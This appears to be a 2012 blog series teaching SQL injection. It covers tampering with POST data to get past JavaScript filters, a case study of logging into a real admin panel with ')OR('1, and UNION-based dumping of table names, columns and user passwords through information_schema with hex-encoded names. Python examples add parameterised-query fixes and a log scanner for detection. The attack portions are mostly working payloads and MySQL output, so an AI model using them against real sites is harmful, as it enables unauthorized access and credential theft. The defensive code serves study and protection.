Wednesday, July 18, 2012

Modifying POST Parameters

Hello friends. So far we have a basic understanding of how and where to inject. But life is not that easy, as it is a never-ending war between developers and breakers.

Let's see another way to inject.

If you look back at this blog, I discussed the 3-tier logic and how a request is processed.

Let's say I have a login form in front of me. I start fuzzing with garbage values, but surprisingly I always get the same error, "Incorrect Credentials". This scenario is not found in every case, but you will run into it sometimes.

What I do now is open "View Page Source" (Ctrl+U) and look for the login form code. If I find something like this:

<form method="POST">
<!-- form fields here -->
<input type="submit" value="Login" onclick="someJavaScriptFunction(value1, value2)" />
</form>

Then you should understand that whatever value is entered gets filtered by the JavaScript code first, and so our input never reaches the second layer, the PHP or ASP source, etc.

This type of filtering is known as client-side filtering.

And the Flow is like this:

Login Form >> (Javascript) >> (PHP/ASP) >> SQL Database

Now, if we can change our values while they are between the JavaScript filter and the PHP/ASP code, our job is done.

For this we need a Firefox add-on, Tamper Data. Install it.

How to work with it: after installing Tamper Data, in the browser click on:

Tools >> Tamper Data >> Start Tamper

Now on the login form, type any value:

Username: admin; Password:idontknow; and then click on Login

Once you do that, you get the option to tamper. Click on Tamper, and you will see the form data you typed on the right-hand side of the Tamper Data window.

This is where you need to change the values again, using ' or " or \ as discussed before, and keep going until you get what you were looking for.

I know this is a little painful, but hey, that's how you deal with it.
   
Stay Tuned For more.

Sunday, July 8, 2012

Case Study 1


This is a case study of a site that was broken into. I will often be posting case studies to show different ways of fuzzing.

Here I am sharing the way the admin panel was broken.

So, I had the admin login page in front of me. The very first thing I can try is to insert a garbage value and see the response. If we get an error directly from the database, that's good; otherwise it's a different story.

The username I entered was 'admin', and the password I entered was '

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression '(UID='admin' AND PWD=''');'


Awesome, we got an error here. Let's try to understand the error.

The moment I entered ' it broke the normal functionality, which means the insertion of ' made the query unbalanced somewhere.


'(UID='admin' AND PWD=''');'

Remove the Outer '

(UID='admin' AND PWD=''');

Remove the ;

(UID='admin' AND PWD=''')

Let's break it down and try to understand.

'  (    UID  =  '  <user_input>  '    AND    PWD = '      <user_input>      '   )  ;'

When user-name: admin and password: '

'  (    UID  =  '  admin  '    AND    PWD = '     '     '   )  ;'

If password is: ')

(    UID  =  '  admin  '    AND    PWD = '      '  )      '   )  ;'

The left side is more or less balanced, but we still have an extra single quote.

If Password is: ')OR('1'

(    UID  =  '  admin  '    AND    PWD = '      '  )   OR   (    ' 1  '    )  ;'

Seems balanced. Let's check it out.

So I am checking with username: admin, password: ')OR('1'

Oops, got an error:

Syntax error in string in query expression '(UID='admin' AND PWD='')OR('1'');'.

[I made this error on purpose, to show you how to learn from the errors]

After analysing the error, I see

PWD='   ')OR('1'   '

Unbalanced quotes. My bad, we need to remove the last single quote from our input,

So again our username: admin, and password: ')OR('1

Whoops, it said Welcome Admin.

This just shows that using a predefined SQL query to break panels is very often useless, because fuzzing always depends on the way the developers built it.
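To make the two points of the last two posts concrete, here is a small Python script. It is an added example, not code from this post or from the site it describes. It rebuilds the concatenated WHERE clause that the JET error message revealed, runs the quote-balancing check the post does by hand, and runs the same login through a parameterised query. SQLite stands in for the JET/Access backend, and the admin table and its password value are constructed for the example. The Tamper Data post is why the server-side version matters: the JavaScript filter never sees an edited POST, so the code behind the form has to treat the values as data on its own.

```python
import sqlite3

# Constructed sample data: one admin account behind a login page like the
# one in the case study. Column names follow the error message on the page
# (UID, PWD); the password value is made up for this example.
SAMPLE_ADMINS = [("admin", "constructed-password-1")]


def make_db():
    """In-memory SQLite database standing in for the JET/Access backend."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (UID TEXT, PWD TEXT)")
    con.executemany("INSERT INTO admin VALUES (?, ?)", SAMPLE_ADMINS)
    return con


def build_vulnerable_where(user, pwd):
    """The concatenated WHERE clause the error message reveals:
    (UID='<user_input>' AND PWD='<user_input>')"""
    return f"(UID='{user}' AND PWD='{pwd}')"


def quote_balanced(sql):
    """Single quotes must pair up for the statement to parse. This is the
    check the case study performs by hand when it strips the outer quote
    and counts what is left."""
    return sql.count("'") % 2 == 0


def login_vulnerable(con, user, pwd):
    """Vulnerable form: whatever the browser sends (with or without the
    JavaScript filter) is spliced into the SQL text."""
    sql = "SELECT UID FROM admin WHERE " + build_vulnerable_where(user, pwd)
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        # SQLite's counterpart of "Syntax error in string in query expression"
        return ("error", str(exc))
    return ("ok", row[0]) if row else ("denied", None)


def login_safe(con, user, pwd):
    """Hardened form: same logic, but the values are bound parameters, so a
    quote in the password is compared as data and never reaches the parser."""
    row = con.execute(
        "SELECT UID FROM admin WHERE UID = ? AND PWD = ?", (user, pwd)
    ).fetchone()
    return ("ok", row[0]) if row else ("denied", None)


if __name__ == "__main__":
    con = make_db()
    # The three passwords tried in the case study, in the same order.
    for pwd in ["'", "')OR('1'", "')OR('1"]:
        clause = build_vulnerable_where("admin", pwd)
        print(f"{pwd!r:12} balanced={quote_balanced(clause)!s:5} "
              f"vulnerable={login_vulnerable(con, 'admin', pwd)} "
              f"safe={login_safe(con, 'admin', pwd)}")
```

Running it reproduces the walk-through: the first two passwords leave an odd number of quotes and fail to parse, the third balances them and the concatenated query logs in as admin without knowing the password, while the parameterised query denies all three.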

That's all for this post.

Saturday, July 7, 2012

Dumping The Database

Okay, now that we know what the tables in the database are, we will try to dump the contents of a table.

So, as we know, we have 3 tables in the 'ckorner' database, viz. 'admin', 'products' and 'users'.

And we also know that the columns of 'admin' are 'id', 'name' and 'pwd'. Let's now try dumping the records.

So our URL is

www.example.com/products.php?id=1

The developer's side is on the left-hand side of '=', and the right-hand side is for us.

Let's try to frame the query on the MySQL server.

The Normal Query:

mysql> select id, product, price from products where id=1;
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer |  2500 |
+------+---------+-------+
1 row in set (0.00 sec)

mysql>

Now our fuzzing starts.


mysql> select id, product, price from products where id= 1 union select 1,2,table_name from information_schema.tables where table_schema='ckorner';
+------+---------+----------+
| id   | product | price    |
+------+---------+----------+
|    1 | printer | 2500     |
|    1 | 2       | admin    |
|    1 | 2       | products |
|    1 | 2       | users    |
+------+---------+----------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id= 1 union select 1,2,column_name from information_schema.columns where table_name='admin';
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer | 2500  |
|    1 | 2       | id    |
|    1 | 2       | name  |
|    1 | 2       | pwd   |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id= 1 union select 1,2,id from ckorner.admin;
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer |  2500 |
|    1 | 2       |     1 |
|    1 | 2       |     2 |
|    1 | 2       |     3 |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id = 1 union select 1,2,name from ckorner.admin;
+------+---------+---------+
| id   | product | price   |
+------+---------+---------+
|    1 | printer | 2500    |
|    1 | 2       | whiskey |
|    1 | 2       | Kumar   |
|    1 | 2       | Onty    |
+------+---------+---------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id = 1 union select 1,2,pwd from ckorner.admin;
+------+---------+-------------+
| id   | product | price       |
+------+---------+-------------+
|    1 | printer | 2500        |
|    1 | 2       | whiskey@123 |
|    1 | 2       | kumar@123   |
|    1 | 2       | Onty@123    |
+------+---------+-------------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id= 1 union select 1,2,concat(name, pwd) from ckorner.admin;
+------+---------+--------------------+
| id   | product | price              |
+------+---------+--------------------+
|    1 | printer | 2500               |
|    1 | 2       | whiskeywhiskey@123 |
|    1 | 2       | Kumarkumar@123     |
|    1 | 2       | OntyOnty@123       |
+------+---------+--------------------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id= 1 union select 1,2,group_concat(name, pwd) from ckorner.admin;
+------+---------+------------------------------------------------+
| id   | product | price                                          |
+------+---------+------------------------------------------------+
|    1 | printer | 2500                                           |
|    1 | 2       | whiskeywhiskey@123,Kumarkumar@123,OntyOnty@123 |
+------+---------+------------------------------------------------+
2 rows in set (0.00 sec)

mysql> select id, product, price from products where id = 9 union select 1,2,group_concat(id, product, price) from ckorner.products;
+------+---------+-------------------------------------------------------+
| id   | product | price                                                 |
+------+---------+-------------------------------------------------------+
|    1 | 2       | 1printer2500,2Laptop15000,3Desktop25000,4pen-drive300 |
+------+---------+-------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select id, product, price from products where id = 9 union select 1,2,group_concat(id, name, pwd) from ckorner.users;
+------+---------+---------------------------------------------------------+
| id   | product | price                                                   |
+------+---------+---------------------------------------------------------+
|    1 | 2       | 1Rishabhrishabh@123,2Web Rulerweb@123,3Mafiozimafia@123 |
+------+---------+---------------------------------------------------------+
1 row in set (0.00 sec)

mysql>


So we see here that if we know the database name, the table name and the columns in the table, we can dump the contents.

Now let's build the same in our URL:

www.example.com/products.php?id=1 union select 1,2,group_concat(id, name, pwd) from ckorner.users --+

In case the above doesn't dump the contents, as before we need to give an id that does not exist in the table; I prefer using negative values.

www.example.com/products.php?id=-1 union select 1,2,group_concat(id, name, pwd) from ckorner.users --+

And this would dump all the id, name and pwd records of the 'users' table from the 'ckorner' database.
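Here is the same products lookup as an added Python example (not this post's own code), run against an in-memory SQLite database that stands in for the MySQL server. The products and users rows are constructed, and the payload is the post's group_concat query rewritten in SQLite syntax. It shows the UNION dump succeeding against the concatenated query, and the same request rejected once the id is validated as an integer and bound as a parameter.

```python
import re
import sqlite3

# Constructed sample data shaped like the page's 'ckorner' schema
# (products and users tables); the values are made up for this example.
PRODUCTS = [(1, "printer", 2500), (2, "Laptop", 15000)]
USERS = [(1, "alice", "constructed-pw-1"), (2, "bob", "constructed-pw-2")]

# The post's payload translated to SQLite syntax: SQLite's group_concat takes
# a single expression, so the three columns are joined with ||, and the URL's
# '--+' arrives at the server as '-- ' once the '+' is decoded to a space.
UNION_PAYLOAD = "-1 union select 1,2,group_concat(id||name||pwd) from users -- "


def make_db():
    """In-memory SQLite database standing in for the MySQL server in the post."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, product TEXT, price INTEGER)")
    con.execute("CREATE TABLE users (id INTEGER, name TEXT, pwd TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return con


def get_product_vulnerable(con, id_param):
    """products.php?id=<id_param> with the raw parameter pasted into the SQL.
    A numeric column needs no quotes, so the injected text needs none either."""
    sql = f"SELECT id, product, price FROM products WHERE id = {id_param}"
    return con.execute(sql).fetchall()


def parse_product_id(id_param):
    """Server-side validation: an id is a string of ASCII digits, nothing else.
    Returns None for anything that is not one, e.g. '-1 union select ...'."""
    if not isinstance(id_param, str) or re.fullmatch(r"[0-9]+", id_param) is None:
        return None
    return int(id_param)


def get_product_safe(con, id_param):
    """Hardened form: validate the type first, then bind the value. Even a
    plain integer is passed as a parameter rather than formatted into the text."""
    product_id = parse_product_id(id_param)
    if product_id is None:
        raise ValueError("id must be a non-negative integer")
    return con.execute(
        "SELECT id, product, price FROM products WHERE id = ?", (product_id,)
    ).fetchall()


if __name__ == "__main__":
    con = make_db()
    print("normal    :", get_product_vulnerable(con, "1"))
    print("vulnerable:", get_product_vulnerable(con, UNION_PAYLOAD))
    print("safe      :", get_product_safe(con, "1"))
    try:
        get_product_safe(con, UNION_PAYLOAD)
    except ValueError as exc:
        print("safe      : rejected ->", exc)
```

The non-existent id (-1) empties the left side of the UNION, so the only row returned is the one carrying the concatenated users table, exactly as in the last MySQL transcript above. The hardened version never builds that statement: the validation rejects the parameter before any SQL is assembled, and the binding means that even a value that passes validation is compared, not parsed.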

Hope this was informative. Stay tuned for more.

Monday, July 2, 2012

Dumping The Columns Of A Table

Okay, so now that we know how to find the table names, let's try to find the columns in the tables.

From our last post we know that the database has three tables:

admin, products, users

And our URL:

www.example.com/index.php?id=1

Let's change the URL for better understanding: assume we are on the products page of the website, where a certain product id displays the information related to that id.

So, www.example.com/products.php?id=1

So in the backend database it's something like this,

mysql> select id, product, price from products where id=1;

+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer |  2500 |
+------+---------+-------+
1 row in set (0.00 sec)

mysql>

We know from the earlier posts that the column count used is three.

Now we will see the magic: we are on the products table, but from this table we will try dumping the data of the other tables in the database.

So let's check the simulation first on the MySQL server.

We will split the query:

SELECT id, product, price FROM products WHERE id = <user input>;

So the left-hand side is the developer's code, and the pentester has to work on the right-hand side.

We know the query below will show the tables in the database,

mysql> select * from products where id=1 union select 1,2,table_name from information_schema.tables where table_schema='ckorner';
+------+---------+----------+
| id   | product | price    |
+------+---------+----------+
|    1 | printer | 2500     |
|    1 | 2       | admin    |
|    1 | 2       | products |
|    1 | 2       | users    |
+------+---------+----------+
4 rows in set (0.00 sec)

So let's say we are interested in the admin table. What do we have to do now? We have to find the columns in the admin table.

Database 'information_schema' has a table named 'columns', whose 'column_name' column holds the column names of all the tables in every database. So we will use the 'information_schema' database once again to find the columns of the table 'admin' in the database 'ckorner'.

mysql> select * from products where id=1 union select 1,2,column_name from information_schema.columns where table_name='admin';
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer | 2500  |
|    1 | 2       | id    |
|    1 | 2       | name  |
|    1 | 2       | pwd   |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql>

So we get the columns of 'admin' in the 'ckorner' database. Let's try the other tables in the 'ckorner' database.

mysql> select * from products where id=1 union select 1,2,column_name from information_schema.columns where table_name='products';
+------+---------+---------+
| id   | product | price   |
+------+---------+---------+
|    1 | printer | 2500    |
|    1 | 2       | id      |
|    1 | 2       | product |
|    1 | 2       | price   |
+------+---------+---------+
4 rows in set (0.00 sec)

mysql> select * from products where id=1 union select 1,2,column_name from information_schema.columns where table_name='users';
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer | 2500  |
|    1 | 2       | id    |
|    1 | 2       | name  |
|    1 | 2       | pwd   |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql>

So we see that it easily dumps the column names of the other tables (admin, users) in spite of being in a query that is supposed to show the contents of the 'products' table.

So now we will put our built queries in the URL:

www.example.com/products.php?id=1

www.example.com/products.php?id=1 union select 1,2,column_name from information_schema.columns where table_name='admin'

It didn't dump. Reason? Remember I said that in a URL the string parameters have to be hex encoded. You can encode the parameter 'admin' with online tools, or you can use our tool to hex encode the parameters.

Download Link: Click Here

The hex encoding of 'admin' is: 0x61646d696e

Are we still missing something? Remember the comment symbol?

We have to comment out the rest of the query being passed, so that before the query reaches the database, the remaining part gets ignored.

www.example.com/products.php?id=1 union select 1,2,column_name from information_schema.columns where table_name=0x61646d696e --+

In some cases, if it doesn't work, you need to change the id value to an id that doesn't exist in the table, like 9999 or -1; using -1 is a sure-shot value to dump, as there would be no records with the value -1.

www.example.com/products.php?id=-1 union select 1,2,column_name from information_schema.columns where table_name=0x61646d696e --+

And this would display the column names of the table 'admin'.

That's all for this post, hope this was informative.
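The hex-encoded table name and the --+ comment are also what a defender looks for in the web server's access log. The following Python script is an added example (not this post's tool or code) that decodes MySQL 0x string literals the way the server would and scans request lines for the indicators of the technique described here: the union ... select keyword pair, a reference to information_schema, a hex string literal and a trailing comment. The sample request lines are constructed and the indicator patterns are my own choices, kept to the shapes this post shows; the last sample line is a benign query containing the word 'union' to check for false positives.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed request lines in access-log form (not from any real site). The
# two injected ones reuse the shapes shown in the post; the last one is a
# benign query containing the word 'union' to check for false positives.
SAMPLE_REQUESTS = [
    "GET /products.php?id=1 HTTP/1.1",
    "GET /products.php?id=1%20union%20select%201,2,column_name%20from%20"
    "information_schema.columns%20where%20table_name=0x61646d696e%20--+ HTTP/1.1",
    "GET /products.php?id=-1+union+select+1,2,group_concat(id,name,pwd)"
    "+from+ckorner.users+--+ HTTP/1.1",
    "GET /search.php?q=union+station HTTP/1.1",
]

# Indicators of the UNION-based technique described in the post.
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.IGNORECASE)
SCHEMA_REF = re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.IGNORECASE)
TRAILING_COMMENT = re.compile(r"--\s*$")  # '--+' in the URL decodes to '-- '


def mysql_hex_to_text(literal):
    """Decode a MySQL 0x... literal as the server would: 0x61646d696e -> 'admin'.
    Raises ValueError for anything that is not a well-formed literal."""
    m = HEX_LITERAL.fullmatch(literal)
    if m is None or len(m.group(1)) % 2:
        raise ValueError(f"not a hex string literal: {literal!r}")
    return bytes.fromhex(m.group(1)).decode("utf-8", errors="replace")


def decoded_params(request_line):
    """Return {name: [values]} for a 'METHOD /path?query HTTP/x' line, with
    percent-encoding and '+' already decoded, as the application sees them."""
    target = request_line.split(" ", 2)[1]
    return parse_qs(urlparse(target).query, keep_blank_values=True)


def scan_value(value):
    """Indicator names found in one decoded parameter value (empty if none)."""
    hits = []
    if UNION_SELECT.search(value):
        hits.append("union_select")
    if SCHEMA_REF.search(value):
        hits.append("information_schema")
    for digits in HEX_LITERAL.findall(value):
        try:
            # Show what the literal spells out, so the analyst sees 'admin', not bytes.
            hits.append("hex_literal:" + mysql_hex_to_text("0x" + digits))
        except ValueError:
            hits.append("hex_literal")
    if TRAILING_COMMENT.search(value):
        hits.append("trailing_comment")
    return hits


def scan_requests(lines):
    """Map each request line that has findings to a list of 'param: indicator'."""
    findings = {}
    for line in lines:
        for name, values in decoded_params(line).items():
            for value in values:
                for hit in scan_value(value):
                    findings.setdefault(line, []).append(f"{name}: {hit}")
    return findings


if __name__ == "__main__":
    for line, hits in scan_requests(SAMPLE_REQUESTS).items():
        print(line.split(" ")[1][:60], "->", ", ".join(hits))
```

Decoding before matching is the important step: the first injected line is percent-encoded and the second uses '+' for spaces, and a pattern applied to the raw URL would see neither "union select" nor the trailing "-- ". Matching on the keyword pair rather than on "union" alone keeps the benign search query out of the results.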

Thank You!